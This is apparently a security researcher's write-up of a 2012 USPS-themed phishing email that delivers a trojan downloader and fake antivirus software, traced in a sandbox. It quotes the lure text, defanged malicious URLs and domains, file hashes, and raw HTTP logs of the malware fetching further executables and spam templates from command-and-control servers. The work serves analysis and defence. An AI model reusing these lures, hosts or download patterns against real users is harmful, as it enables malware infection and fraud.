This is a new take on an old trick, and a 'low-budget' one at that. Whatever the case, this email is also very much malicious. My fully patched Windows 7 sandbox was quickly popped by the bug without any effort. It also did not seem to matter that the user-id was had only limited user privileges and I received no UAC approval window when it was triggered. Very disturbing.
There's no visible text in the email when displayed as HTML. But there is hidden text in the background that is probably intended to make the message appear legitimate to spam filters. The text itself appears to be pulled from 3 novels which have long since found their way into the public domain:
From "Artemus Ward (his travels) among the Mormons, Part 1" by John Camden Hotten (originally published in 1865)
. . .Sometimes they introduce a full brass and string band in Church. Brigham Young says the devil has monopolized the good music long enough, and it is high time the Lord had a portion of it. . .
From "A Fleece of Gold: Five Lessons from the Fable of Jason and Golden Fleece" by Charles Steward Given (originally published in 1905)
. . .Galen, the famous anatomist, after a prolonged study of the human hand, conceiving it to be the proximate instrument of the soul, was forced to renounce atheism, to acknowledge the existence of a Supreme Being. . .
From "The Entire PG Works by George Meredith, Volume 1 of 10" by George Meredith (originally published in 1851)
. . .Richard mechanically sat down on the crumbling flints to rest, and listened to the panting of the dog. Sprinkled at his feet were emerald lights: hundreds of glow- worms studded the dark dry ground. . .
I wonder how the original email author came upon these three distinctly different novels as even in an internet connected world, it seems unlikely that these are just the result of a "What novels should I quote to bypass spam filters?" Google search
That said, the user only sees a low quality jpg image (pulled from http://bdedieu [DOT] perso [DOT] neuf [DOT] fr/HIDVRTXUKI [DOT] jpg) when they open the message claiming that USPS failed to deliver a package. . .
USPS.COM
Unfortunately, we failed to deliver the postal package you have sent on the 27th of august in time, because the recipient's address is erroneous.
Please go to the nearest UPS office and show your shipping label.
If the parcel isn't received within 30 working days our company will have the right claim compensation from you for each day of keeping.
Low quality JPG referring to a phantom parcel
Not sure why I would be taking a USPS/United States Postal Service receipt to a UPS/United Parcel Service office, but whatever.
Clicking on the image sends the user to http://bdedieu [DOT] perso [DOT] neuf [DOT] fr/XREOWCDHOS [DOT] htm, which has only a very simple javascript within commanding the browser to download a file named Label_Copy_USPS [DOT] zip. . .
Javascript to download the Label_Copy_USPS file
The zip file itself contains a malicious file named Label_Copy_USPS [DOT] exe, with an embeded icon that makes it look like a MSWord document to the untrained eye.
Not really a word document, no matter what it says
Unique File Details:
Filename -- Label_Copy_USPS [DOT] exe
File size -- 88576 bytes (86.5 KB)
Filetype -- PE32 executable for MS Windows (GUI) Intel 80386 32-bit (Win32 Executable Generic)
MD5 Hash -- 7c35f845a49f95e6797ee89073cf1d89
SHA1 Hash -- 8dc099b23270b70a42dad714a230c4b51eb06175
SHA256 Hash -- 254dd09af71c45cbad147aa523cf7f277340c1e0799fba9b36f20942f295c63d
Online malware scanners identified the file as:
AntiVir -- TR/Crypt.ZPACK.Gen
Avira -- TR/Crypt.ZPACK.Gen
Eset -- Win32/Kryptik.ALDT (Variant)
F-Prot -- W32/Falab.J6.gen!Eldorado
Kaspersky Lab -- Trojan-Downloader.Win32.Kuluoz.ar
McAfee -- Generic BackDoor.adp
Norman -- W32/Obfuscated.D!genr
Sophos -- Mal/EncPk-AGK
The file also appears to have authentic metadata information, though it could just as easily be another misdirect.
File Description: Fatal Hums 32
Company: EPoX
File Version: 2.2.0.1112
Date Created: 8/30/2012 6:57 AM
Size: 86.5 KB
Opened the file in the sandbox and confirmed it's malicious nature.
It appears to execute, but doesn't display anything but an empty document in notepad named "Label_Copy_USPS". Not sure if that's just for appearance, or if it's exploiting something in notepad on my fully patched sandbox machine.
Just an empty notepad document
The Label_Copy_USPS.exe file with the MSWord icon has also been replaced with an empty text file named Label_Copy_USPS.txt.
After that, nothing else. At least for a few minutes.
Then I get a popup for something called Security Monitor claiming:
Security Monitor: WARNING!
Attention! System detected a potential hazard (TrojanSPM/LX) on your computer
that may infect executable files. Your private information and PC Safety
is at risk.
To get rid of unwanted spyware and keep your computer safe you need to update your computer security software.
Click Yes to download official intrusion detection system (IDS software)
Bogus Security Monitor Warning
Followed by an ominous systemtray flag. . .
WARNING!
Application cannot be executed. The file notepad.exe is infected.
Please activate your antivirus software.
Bogus Infected File Flag
And then conveniently a scan from Live Security Platinum (one of the Fake Antivirus variants) which I of course didn't knowingly install. . .
Live Security Platinum (one of the Fake Antivirus variants)
I've seen these before, and it always amuses me how it claims certain applications are infected on machine (even though they are not actually installed)
But whatever the case, it throws the expected "Your machine is infected with many malicious bugs, It is highly recommended that you remove all the threats from your computer immediately" message.
Bogus Infected Machine Warning
And of course clicking on the button takes the user to an online website asking for a credit card number.
Basically anything that I did on the machine from this point on triggered an alert claiming that whatever application I was trying to open was infected, right after the process was terminated for my 'safety'
But that's not all that's going on. . .
Behind the scenes, this all starts with a HTTP connection on TCP84 to a Netherlands IP (93.184.100.116) and pulled down another malicious exe file named 3b0c6a8305cc89cf77f3c9616a569e78 [DOT] exe. . .
GET /d0f7718d96B962A24D5DB24495EF4073722C70A2F37B8ED45222F5F57F5006B4F30287DE5E832CD19BA0C26553344C35D1833C79DC573864758807A47C3CED5B939DECA6688F364B7F8C HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 93.184.100.116:84
HTTP/1.1 200 OK
Server: nginx/0.8.55
Date: Thu, 30 Aug 2012 20:53:14 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3-7+squeeze13
Vary: Accept-Encoding
Content-Length: 49
c=run&u=/get/3b0c6a8305cc89cf77f3c9616a569e78 [DOT] exeGET //get/3b0c6a8305cc89cf77f3c9616a569e78 [DOT] exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)
Host: 93.184.100.116:84
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/0.8.55
Date: Thu, 30 Aug 2012 20:53:14 GMT
Content-Type: application/x-msdos-program
Connection: keep-alive
Last-Modified: Thu, 30 Aug 2012 20:30:04 GMT
ETag: "ddc0f1-66a00-4c8818a54eb00"
Accept-Ranges: bytes
Content-Length: 420352
MZ......................@...............................................!..L.!This program cannot be run in DOS mode. [FILE CONTINUES]
And then it pulls yet another malicious file, passF [DOT] dll [DOT] crp. . .
GET /d0f7718d96B962A24D5DB24495EF4073722C70A2F37B8ED45222F5F57F5006B4F30287DE5E832CD19BA0C26553344C35D1833C79DC573864758807A47C3CED5B939DECA6688F364B7F8C HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 93.184.100.116:84
HTTP/1.1 200 OK
Server: nginx/0.8.55
Date: Thu, 30 Aug 2012 20:55:18 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3-7+squeeze13
Vary: Accept-Encoding
Content-Length: 49
c=rdl&u=/get/passF.dll.crp&a=0&k=00005f73&n=passFGET //get/passF.dll.crp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 93.184.100.116:84
HTTP/1.1 200 OK
Server: nginx/0.8.55
Date: Thu, 30 Aug 2012 20:55:18 GMT
Content-Type: application/x-msdos-program
Connection: keep-alive
Last-Modified: Fri, 24 Aug 2012 12:47:50 GMT
ETag: "ddc0f8-1a9e00-4c80262356980"
Accept-Ranges: bytes
Content-Length: 1744384
>...p_..w_......._..s_..3_..s_..s_..s_..s_..s_..s_..s_..s_..{^..}@..s...R..L.~Th., p.0gr.2 c.1no..beS-unS6n 7.S .0de]R
W_..s_..+...oO..oO..[FILE CONTINUES]
And because that clearly wasn't enough, it connects to Hong Kong (175.41.28.156) to log itself as 'installed'. . .
GET /api/stats/install/?ts=26070510&affid=41100&ver=3060001&group=liv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent:
Host: 175.41.28.156
HTTP/1.1 200 OK
Server: nginx/1.2.3
Date: Thu, 30 Aug 2012 20:56:18 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: keep-alive
Then the bug downloads silently completes a form in Kazakhstan (195.210.47.109) and downloads a spam email template. . .
POST /index.php HTTP/1.1
Host: 195.210.47.109:80:80
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 6.1; SV1; .NET CLR 1.1.4777)
Accept: */*
Accept-Language: en-gb
Accept-Encoding: deflate
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 746
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="sid"
0549571111555245
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="up"
13849612
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="wbfl"
1
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="v"
137
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="ping"
457
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="guid"
{DAB0CFA5-8A9B-4160-8DA8-8F2A01AC8EF6}
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="wv"
6#2#1#0#7601#0
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="sr"
0
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="ar"
0
--1BEF0A57BE110FD467A--
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Aug 2012 20:56:30 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.3.3-7+squeeze13
Vary: Accept-Encoding
f4a
HTTP/1.1 200 OK
Date: Thu, 30 Aug 2012 20:56:29 GMT
Server: Apache/2.2.16
Content-Length: 55876
Connection: close
Content-Type: multipart/form-data; boundary="1BEF0A57BE110FD467A"
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="COMMON"; filename="COMMON.BIN"
Content-Type: application/octet-stream
'hr.%+./".,****...)/.'4hr.%.'ywtxp%.'m%.***.'4m%.'h%**/5)+)5)/,5*#)!#/.*,(5)(+5*(*5*-#!#/.*,(5##5.5(!#+.*##5*(#5".5*((!#/.)+(5*(+5*)"5.#!#/.)+"5)+5,#5)/*!#/.-#5*,(5*#)5*)#!#/.,)5..[FILE CONTINUES]
Once downloaded, the sandbox becomes a mailzombie and starts blasting the world. . .
Meanwhile. . . the bug is also trying to pull down more badness from Germany (78.159.108.83). . .
GET /ajax/libs/jquery/1.6.4/jquery [DOT] min [DOT] js HTTP/1.1
Accept: */*
Referer: http://chechoutbiz [DOT] com/p/liv/?group=liv&ver=3060001&reject_url=http%3A%2F%2Fchechoutbiz [DOT] com%3A80%2Fp%2Fdecline%2F%3Fgroup%3Dliv%26ver%3D3060001%26nid%3DD0F7718D%26affid%3D41100&nid=D0F7718D&affid=41100
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)
Connection: Keep-Alive
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Type: text/javascript; charset=UTF-8
Last-Modified: Mon, 02 Apr 2012 18:24:28 GMT
Date: Thu, 30 Aug 2012 18:41:47 GMT
Expires: Fri, 30 Aug 2013 18:41:47 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 32103
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 8101
............y..../....MD...j..v.%`C...-..K..aS.....H.Zr......SU(......}...(.j=u.:K.i.l...|....U.?{..M..M...........C.p.-..2.W...i.....U./.+?VIpo...[?.....v.:....O.*[.Q.0...j...?l.(..<[FILE CONTINUES]
And then yet another file from Missouri (209.20.78.241) via TCP84. . .
GET /d0f7718d96B962A24D5DB24495EF4073722C70A2F37280D51B2FB5E0240E44F8B14D849155C63ADBC2A2CA31 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 209.20.78.241:84
HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Thu, 30 Aug 2012 21:03:11 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3-7+squeeze13
Vary: Accept-Encoding
Content-Length: 225
..9.......Q0.r+..W..As..yP........k....mEq.v..j!...fg.@.o?.Y....|.4rh.....5^.....{.j..q.SK.q.....U..........'2.e9..IrKJe.,zSo/..o.a8_.cf.......~(MD.+.P.........f...?......M..^{Q.|.f...@.;.%Y.(.K..8PF..S..\l.%..W..v.&8a.KR....
And then back to Germany (slopokan21 [DOT] ru) to fill out another online form. . .
POST /index [DOT] php HTTP/1.1
Host: slopokan21 [DOT] ru:80
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 6.1; SV1; .NET CLR 1.1.4777)
Accept: */*
Accept-Language: en-gb
Accept-Encoding: deflate
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 2936
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="sid"
2505323811778201
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="up"
14097139
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="wbfl"
0
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="v"
137
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="ping"
457
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="guid"
{DAB0CFA5-8A9B-4160-8DA8-8F2A01AC8EF6}
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="wv"
6#2#1#0#7601#29
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="ms"
758019024:121:2000:0:0:0:25:0:0:0:0:0:0:0:0:0:0
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="smtx"
CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="sr"
0
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="ar"
0
--1BEF0A57BE110FD467A--
HTTP/1.0 303 See Other
Location: http://slopokan21 [DOT] ru:80/index [DOT] php
Content-Length: 0
Connection: close
Date: Thu, 30 Aug 2012 21:00:40 GMT
The connections and downloads continue with zero sign of stopping. And again, all of this is taking place silently behind the scenes without the user ever knowing.
Good times
Original source email (minus the HTML formatting):
Delivered-To: christoperj
Received: by 10.231.42.212 with SMTP id t20csp39528ibe;
Thu, 30 Aug 2012 09:52:10 -0700 (PDT)
Received: by 10.50.236.39 with SMTP id ur7mr1239726igc.62.1346345530047;
Thu, 30 Aug 2012 09:52:10 -0700 (PDT)
Return-Path:
Received: from mailforward. (mailforward.. [10.10.10.23])
by mx. with ESMTP id i2si3576532icy.69.2012.08.30.09.52.09;
Thu, 30 Aug 2012 09:52:10 -0700 (PDT)
Received-SPF: neutral (: 10.10.10.23 is neither permitted nor denied by best guess record for domain of www@suzan.yourwebhost [DOT] com) client-ip=10.10.10.23;
Authentication-Results: mx.; spf=neutral (: 10.10.10.23 is neither permitted nor denied by best guess record for domain of www@suzan.yourwebhost [DOT] com) smtp.mail=www@suzan.yourwebhost [DOT] com
Received: from mx1. (inbound-us1. [70.87.28.133])
by mailforward. (Postfix) with ESMTP id 72C0E162C3C6
for; Thu, 30 Aug 2012 16:52:09 +0000 (GMT)
Received: from suzan.yourwebhost [DOT] com (suzan [DOT] yourwebhost [DOT] com [209.239.43.1])
by mx1. (Postfix) with ESMTP id 58343471681
for; Thu, 30 Aug 2012 16:52:09 +0000 (GMT)
Received: (from www@localhost)
by suzan.yourwebhost [DOT] com (8.14.3/8.12.10) id q7UGq3Uc015428;
Thu, 30 Aug 2012 12:52:03 -0400
Date: Thu, 30 Aug 2012 12:52:03 -0400
Message-Id: <201208301652 .q7ugq3uc015428=".q7ugq3uc015428" com="com" suzan="suzan" yourwebhost="yourwebhost">
To: christoperj
Subject: Delivery refuse ID#36556
From: "USPS Customer Service"
X-Mailer: CF-XPInformer
Reply-To: "USPS Customer Service"
Mime-Version: 1.0
Content-Type:multipart/mixed;boundary="----------1346345523503F9A33361C5"
X-CTCH-Spam: Suspect
X-CTCH-VOD: Unknown
X-CTCH-RefID: str=0001.0A0B0209.503F9A39.0103,ss=2,re=0.000,recu=0.000,reip=0.000,cl=2,cld=1,fgs=0
------------1346345523503F9A33361C5
[LINK TO http://bdedieu [DOT] perso [DOT] neuf [DOT] fr/XREOWCDHOS [DOT] htm" USING IMAGE FILE POINTING TO http://bdedieu [DOT] perso.neuf [DOT] fr/HIDVRTXUKI [DOT] jpg"]
There are no ravishingly beautiful women present, and no positively ugly ones.The men are fair to middling. They will never be slain in cold blood for their beauty, nor shut up in jail for their homeliness. There are some good voices in the choir to-day, but the orchestral accompaniment is unusually slight. Sometimes they introduce a full brass and string band in Church. Brigham Young says the devil has monopolized the good music long enough, and it is high time the Lord had a portion of it. Therefore trombones are tooted on Sundays in Utah as well as on other days; and there are some splendid musicians there. The Orchestra in Brigham Youngs theatre is quite equal to any in Broadway. There is a youth in Salt Lake City (I forget his name) who plays the cornet like a North American angel. Mr. Stenhouse relieves me of any anxiety I had felt in regard to having my swan-like throat cut by the Danites, but thinks my wholesale denunciation of a people I h!
ad never seen was rather hasty.
And the plaudits of men and of angels attend the young man today who has a worthy object in view, who believes in himself, and bends to the oars with might and main.An active hand symbolizes usefulness and thrift. Has it ever occurred to you what a wonderful piece of mechanism is that hand with which Nature has equipped you for seizing the oars of lifes activities? Galen, the famous anatomist, after a prolonged study of the human hand, conceiving it to be the proximate instrument of the soul, was forced to renounce atheism, to acknowledge the existence of a Supreme Being. Scientists regard the human hand as being the most remarkable organ, not vital, in the whole animal kingdom. It is conceded to be, also, the most pronounced physical characteristic differentiating man from the lower animals. The chimpanzee and the gorilla, closely allied to the human species in many respects, are noticeably deficient in the use of their modified hands; being able to grasp things only in a c!
umbersome way.
Tongue out of mouth trotted the little dog after him; crouched panting when he stopped an instant; rose weariedly when he started afresh.Now and then a large white night-moth flitted through the dusk of the forest. On a barren corner of the wooded highland looking inland stood grey topless ruins set in nettles and rank grass-blades. Richard mechanically sat down on the crumbling flints to rest, and listened to the panting of the dog. Sprinkled at his feet were emerald lights: hundreds of glow- worms studded the dark dry ground. He sat and eyed them, thinking not at all. His energies were expended in action. He sat as a part of the ruins, and the moon turned his shadow Westward from the South. Overhead, as she declined, long ripples of silver cloud were imperceptibly stealing toward her. They were the van of a tempest. He did not observe them or the leaves beginning to chatter.
------------1346345523503F9A33361C5--